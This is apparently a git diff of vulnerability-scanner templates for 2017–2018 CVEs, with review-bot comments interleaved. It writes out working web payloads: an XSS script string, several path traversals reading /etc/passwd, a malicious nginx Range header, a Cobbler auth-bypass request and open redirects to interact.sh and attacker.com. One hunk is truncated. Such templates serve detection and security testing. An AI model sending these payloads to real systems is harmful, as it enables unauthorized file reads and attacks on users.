https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - epss-score: 0.00286 - epss-percentile: 0.65504 - cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: kmc_information_systems - product: caseaware - tags: cve2017,cve,edb,xss,caseaware,kmc_information_systems + tags: cve,cve2017,xss,caseaware -http: +requests: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" 
@@ -49,4 +35,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402207d69e52f52d55a7b3f0d17541fe9f915dd4df8934f92181ed2e92d60ac0c7bde022072d4faaaef53a8a71f6ad67625ef5ce22b85459680a16b880dabe2a2c39f4099:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2017-7269.yaml b/poc/cve/cve-2017-7269.yaml new file mode 100644 index 0000000000..07f7419224 --- /dev/null +++ b/poc/cve/cve-2017-7269.yaml @@ -0,0 +1,45 @@ +id: CVE-2017-7269 + +info: + name: Windows Server 2003 & IIS 6.0 - Remote Code Execution + author: thomas_from_offensity,geeknik + severity: critical + description: | + Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If ", dasl) # lowercase header name: DASL + - regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV + - regex(".*?PROPFIND", public) # lowercase header name: Public + - regex(".*?PROPFIND", allow) # lowercase header name: Allow + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-7529.yaml b/poc/cve/cve-2017-7529.yaml index b05d81075d..63d93927e1 100644 --- a/poc/cve/cve-2017-7529.yaml +++ b/poc/cve/cve-2017-7529.yaml 
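Review bot: The cve-2017-7269 hunk is truncated in this rendering: `@@ -0,0 +1,45 @@` announces 45 added lines but the text jumps from the `description` to a `dasl)` fragment in the middle of a `dsl` matcher, so only the tail is reviewable. What is visible matches `PROPFIND` in the `DASL`, `DAV`, `Public` or `Allow` response headers with `condition: or` plus a 200 status, which fingerprints WebDAV being enabled rather than confirming the `ScStoragePathFromUrl` overflow, yet the template is `severity: critical` and titled `Remote Code Execution`. The `description` should say so, e.g. append `Detection checks whether WebDAV is enabled on the host and does not confirm exploitability; treat hits as candidates for version verification.` The inline `# lowercase header name:` comments on the `regex()` calls are helpful and worth keeping.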
@@ -1,29 +1,27 @@ id: CVE-2017-7529 + info: - author: "Harsh Bothra" - name: "Nginx Remote Integer Overflow" + name: Nginx Remote Integer Overflow + author: medbsq severity: medium -# This template supports the detection part only. -# Do not test any website without permission -# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py - +# https://www.cvebase.com/cve/2017/7529 requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Range: bytes=-17208,-9223372036854758792 - Connection: close - + - method: GET + path: + - "{{BaseURL}}/" + headers: + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Range: bytes=-17208,-9223372036854758792 matchers-condition: and matchers: + - type: word + words: + - "Server: nginx" + - "Content-Range" + condition: and + part: header - type: status status: - 206 - - type: word - words: - - Content-Range - part: all \ No newline at end of file diff --git a/poc/cve/cve-2017-9833.yaml b/poc/cve/cve-2017-9833.yaml index fcdf436a30..ed4f48506c 100644 --- a/poc/cve/cve-2017-9833.yaml +++ b/poc/cve/cve-2017-9833.yaml 
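Review bot: The new header matcher requires both `Server: nginx` and `Content-Range` with `condition: and`, so an nginx behind a proxy or build that rewrites or suppresses the `Server` banner is reported clean even when the 206 response to the negative `Range` comes back; conversely the banner is what keeps other servers that legitimately honour a suffix range out of the results. That trade-off is not recorded anywhere in the template; a comment above the matcher such as `# Server banner required so non-nginx servers that answer a suffix range with 206 are not flagged; nginx with a hidden banner is missed` would document it. The hard-coded `User-Agent` header is unrelated to the check and can be dropped if the engine's default is acceptable for the target.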
@@ -5,31 +5,17 @@ info: author: 0x_Akoko severity: high description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials. - impact: | - An attacker can gain unauthorized access to sensitive files on the server. - remediation: | - Upgrade to a patched version of BOA Web Server or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42290 - - https://nvd.nist.gov/vuln/detail/CVE-2017-9833 - - https://pastebin.com/raw/rt7LJvyF - - https://www.exploit-db.com/exploits/42290/ - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2017-9833 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 cve-id: CVE-2017-9833 cwe-id: CWE-22 - epss-score: 0.7354 - epss-percentile: 0.98027 - cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: boa - product: boa - tags: cve,cve2017,boa,lfr,lfi,edb + tags: boa,lfr,lfi,cve,cve2017 -http: +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0" @@ -43,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2018-1000226.yaml b/poc/cve/cve-2018-1000226.yaml index 5eb5e5ebfa..c070e810a9 100644 --- a/poc/cve/cve-2018-1000226.yaml +++ b/poc/cve/cve-2018-1000226.yaml 
@@ -1,32 +1,21 @@ id: CVE-2018-1000226 info: - name: Cobbler - Authentication Bypass + name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass author: c-sh0 severity: critical - description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - epss-score: 0.01309 - epss-percentile: 0.8563 - cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cobblerd - product: cobbler - tags: cve2018,cve,cobbler,auth-bypass,cobblerd + tags: cve,cve2018,cobbler,auth-bypass -http: +requests: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 @@ -47,9 +36,9 @@ http: matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" + - type: status + status: + - 200 - type: word part: header 
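Review bot: The new side removes `description` without replacing it, so the template no longer states what it detects, and moving the version text into `name` (`Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass`) makes the title awkward and unsortable. Suggest `name: Cobbler - XMLRPC API Authentication Bypass` plus a one-line `description:` covering the improperly validated security tokens in the `/cobbler_api` endpoint, as the removed text did. The `reference` list still points at the NVD entry, so the description can stay short.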
@@ -61,12 +50,11 @@ http: words: - "" + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" + - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" - - - type: status - status: - - 200 -# digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1000671.yaml b/poc/cve/cve-2018-1000671.yaml new file mode 100644 index 0000000000..d6302807a8 --- /dev/null +++ b/poc/cve/cve-2018-1000671.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-1000671 + +info: + name: Sympa version =>6.2.16 - Cross-Site Scripting + author: 0x_Akoko + severity: medium + description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs. + reference: + - https://github.com/sympa-community/sympa/issues/268 + - https://vuldb.com/?id.123670 + - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-1000671 + cwe-id: CWE-601 + metadata: + shodan-query: http.html:"sympa" + verified: "true" + tags: cve,cve2018,redirect,sympa,debian + +requests: + - method: GET + path: + - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email=' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/08/18 diff --git a/poc/cve/cve-2018-10956.yaml b/poc/cve/cve-2018-10956.yaml index a509b9736d..1cde241ed5 100644 --- a/poc/cve/cve-2018-10956.yaml +++ b/poc/cve/cve-2018-10956.yaml 
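Review bot: `!contains(tolower(body), 'faultCode')` can never reject anything: `tolower(body)` lowercases the whole response while the needle keeps an uppercase `C`, so `contains` is always false and the negated matcher always passes, meaning an XML-RPC fault response is not filtered out. Use a lowercase needle, `- "!contains(tolower(body), 'faultcode')"`. The bug predates this commit, but the hunk moves the line, so this is the place to fix it.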
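Review bot: The new cve-2018-1000671 template hard-codes `http://interact.sh` as the redirect target and `interact\.sh` in the `Location` regex, so every run points the target's redirect at a real third-party domain and the match is tied to it; in the same commit cve-2016-3978 switches to `www.example.com` and cve-2018-12300 to `www.attacker.com`, so three conventions now coexist. A reserved name such as `example.com` in both the path and the regex keeps the template self-contained and consistent with cve-2016-3978. `verified: "true"` is a quoted string rather than the boolean `true` the repo used before this commit, and the `matchers:` block has no status check to pair with the header regex.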
@@ -1,37 +1,23 @@ id: CVE-2018-10956 - info: - name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion + name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. author: 0x_Akoko severity: high - description: | - IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion. - impact: | - An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. - remediation: | - Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability. + description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. reference: - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb - - https://www.exploit-db.com/exploits/44916/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-10956 - - https://github.com/xbl3/awesome-cve-poc_qazbnm456 + - https://www.cvedetails.com/cve/CVE-2018-10956 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H cvss-score: 7.5 cve-id: CVE-2018-10956 cwe-id: CWE-22 - epss-score: 0.57917 - epss-percentile: 0.97652 - cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: ipconfigure - product: orchid_core_vms shodan-query: http.title:"Orchid Core VMS" - tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure + tags: cve,cve2018,orchid,vms,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" 
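Review bot: `cvss-metrics` is changed to `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`, a vector with no confidentiality impact, while the template reads `/etc/passwd` through an encoded `../` traversal and keeps `cwe-id: CWE-22`, the `lfi` tag and `cvss-score: 7.5`; `C:N/I:H/A:H` does not describe a file read and the retained score no longer follows from the vector. The previous `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` is the vector consistent with the description and the 7.5 score. `name:` also gained a trailing period (`Unauthenticated Directory Traversal.`) that no other title in this commit has.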
@@ -45,4 +31,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4b3ba62ada360ed542a1dc3aeb23fe810a3516b33b87653ac8cc1e848028c5b0221009dcb0edfc90ad78d55ad83bcfc106071329ffdb8ca67a671481c79a10b2a61cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-12300.yaml b/poc/cve/cve-2018-12300.yaml index 94384ca163..aac189bfd8 100644 --- a/poc/cve/cve-2018-12300.yaml +++ b/poc/cve/cve-2018-12300.yaml 
@@ -1,39 +1,28 @@ id: CVE-2018-12300 info: - name: Seagate NAS OS 4.3.15.1 - Open Redirect + name: Seagate NAS OS 4.3.15.1 - Open redirect author: 0x_Akoko severity: medium - description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter. - impact: | - Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware. - remediation: | - Apply the latest security patches or updates provided by Seagate to fix the open redirect vulnerability in NAS OS 4.3.15.1. + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. reference: - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12300 + - https://www.cvedetails.com/cve/CVE-2018-12300 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2018-12300 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.45685 - cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: seagate - product: nas_os - tags: cve2018,cve,redirect,seagate,nasos + tags: cve,cve2018,redirect,seagate,nasos -http: +requests: - method: GET + path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# 
digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2018-1247.yaml b/poc/cve/cve-2018-1247.yaml index 4d0cf1ab7e..e522302ccb 100644 --- a/poc/cve/cve-2018-1247.yaml +++ b/poc/cve/cve-2018-1247.yaml @@ -4,7 +4,6 @@ info: name: RSA Authentication Manager XSS author: madrobot severity: medium - tags: cve,cve2018,xss,flash requests: - method: GET diff --git a/poc/cve/cve-2018-12675.yaml b/poc/cve/cve-2018-12675.yaml index 52e4353249..d1f5d24b6f 100644 --- a/poc/cve/cve-2018-12675.yaml +++ b/poc/cve/cve-2018-12675.yaml 
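Review bot: The canary was changed from `interact.sh` to `www.attacker.com`, a live domain registered by a third party that the project does not control; the template now asserts a redirect to a host someone else can point anywhere, and it diverges from the rest of the corpus (the sibling cve-2020-18268 change in this same commit uses the RFC 2606 reserved `example.com`). Use `{{BaseURL}}/echo-server.html?code=test&state=http://www.example.com#` and `example\.com` in the regex, or keep `interact.sh`. Making the scheme group optional (`…|\/\\)?`) additionally lets a path-relative `Location: …` match, which is not an open redirect.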
@@ -6,32 +6,21 @@ info: severity: medium description: | SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. - remediation: | - Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 - - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.44971 - cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: sv3c - product: h.264_poe_ip_camera_firmware + verified: "true" tags: cve,cve2018,redirect,sv3c,camera,iot -http: +requests: - method: GET path: - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' @@ -41,4 +30,5 @@ http: part: body words: - '' -# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by md on 2022/10/13 diff --git a/poc/cve/cve-2018-14918.yaml b/poc/cve/cve-2018-14918.yaml index 882b57bf37..4c75905015 100644 --- a/poc/cve/cve-2018-14918.yaml 
+++ b/poc/cve/cve-2018-14918.yaml @@ -6,33 +6,21 @@ info: severity: high description: | LOYTEC LGATE-902 6.3.2 is susceptible to local file inclusion which could allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords. - impact: | - Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. - remediation: | - Apply the latest firmware update provided by LOYTEC to fix the LFI vulnerability. reference: - https://seclists.org/fulldisclosure/2019/Apr/12 - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-14918 - - https://github.com/ARPSyndicate/kenzer-templates - - https://github.com/HimmelAward/Goby_POC classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-14918 cwe-id: CWE-22 - epss-score: 0.44897 - epss-percentile: 0.97077 - cpe: cpe:2.3:o:loytec:lgate-902_firmware:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: loytec - product: lgate-902_firmware shodan-query: http.html:"LGATE-902" - tags: cve,cve2018,loytec,lfi,seclists,packetstorm,lgate,xss + verified: "true" + tags: loytec,lfi,seclists,packetstorm,cve,cve2018,lgate -http: +requests: - method: GET path: - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" @@ -47,4 +35,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/07 
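Review bot: The description on the new side reads `This can be used to read and configuration files containing…`, which is missing a word; write `This can be used to read configuration files containing, e.g., usernames and passwords.` Dropping the `xss` tag is consistent with the template exercising only the traversal path, so no objection there.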
diff --git a/poc/cve/cve-2018-16761.yaml b/poc/cve/cve-2018-16761.yaml index 23f9df48fa..7f0883240e 100644 --- a/poc/cve/cve-2018-16761.yaml +++ b/poc/cve/cve-2018-16761.yaml @@ -6,10 +6,6 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -19,16 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 - cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: eventum_project - product: eventum - tags: cve,cve2018,redirect,eventum,oss,eventum_project + tags: cve,cve2018,redirect,eventum,oss -http: +requests: - method: GET path: - '{{BaseURL}}/select_project.php?url=http://interact.sh' @@ -39,5 +28,6 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by md on 2022/10/13 
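Review bot: In the last hunk, making the scheme group optional (`(?:https?:\/\/|\/\/|\/\\\\|\/\\)?`) lets a path-relative `Location: interact.sh/…` satisfy the matcher; a relative Location is resolved against the target's own origin and is therefore not an open redirect, so the previous mandatory prefix was the safer form. Unless a known scheme-less response from Eventum needs it, keep the group mandatory: `'(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'`. The matchers block this line belongs to starts outside the hunk.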
diff --git a/poc/cve/cve-2018-19365.yaml b/poc/cve/cve-2018-19365.yaml index 2b040cfd71..7b30433c16 100644 --- a/poc/cve/cve-2018-19365.yaml +++ b/poc/cve/cve-2018-19365.yaml 
@@ -1,34 +1,20 @@ id: CVE-2018-19365 - info: - name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal + name: Wowza Streaming Engine Manager Directory Traversal author: 0x_Akoko - severity: critical - description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. - impact: | - An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information. - remediation: | - Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability. + severity: high + description: The REST API in Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request reference: - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-19365 - - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2018-19365 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H - cvss-score: 9.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2018-19365 cwe-id: CWE-22 - epss-score: 0.01354 - epss-percentile: 0.8589 - cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: wowza - product: streaming_engine - tags: cve2018,cve,wowza,lfi + tags: cve,cve2018,wowza,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" 
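Review bot: The severity is downgraded from `critical` to `high` and the availability impact dropped (`A:H` to `A:N`, score 9.1 to 7.5) while the only reference left is a cvedetails link; the removed NVD link and 9.1 vector presumably reflected NVD's record, and nothing in the hunk supports the re-scoring. Unless there is a source for the lower score, keep `severity: critical` and `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H`, or cite the source that justifies the change under `reference`. The `name` also loses the affected version `4.7.4.01` that the description still states.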
@@ -43,4 +29,3 @@ http: - type: status status: - 200 -# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-7602.yaml b/poc/cve/cve-2018-7602.yaml index aa1cc6dda2..243e590b31 100644 --- a/poc/cve/cve-2018-7602.yaml +++ b/poc/cve/cve-2018-7602.yaml 
@@ -1,35 +1,19 @@ id: CVE-2018-7602 - info: - name: Drupal - Remote Code Execution + name: Drupal Remote Code Execution Vulnerability author: princechaddha severity: critical - description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. - impact: | - Remote attackers can execute arbitrary code on the affected Drupal installations. - remediation: | - Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. + description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. 
